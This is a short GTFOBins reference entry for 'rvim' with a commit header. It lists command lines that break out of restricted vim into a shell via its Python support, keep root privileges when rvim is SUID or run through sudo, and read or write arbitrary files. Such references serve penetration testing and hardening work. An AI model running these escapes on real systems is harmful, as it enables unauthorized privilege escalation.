GTFOBins.github.io/_gtfobins/rvim.md
Andrea Cardaci 32b113b003 Fix and add SUID to other vi
Related to #39.
2018-12-03 16:00:11 +01:00

759 B

functions
shell file-write file-read suid sudo
description code
This requires that `rvim` is compiled with Python support. rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
description code
This requires that rvim is compiled with Python support. rvim file_to_write iDATA ^[ w
code
rvim file_to_read
description code
This requires that `rvim` is compiled with Python support. ./rvim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
description code
This requires that `rvim` is compiled with Python support. sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'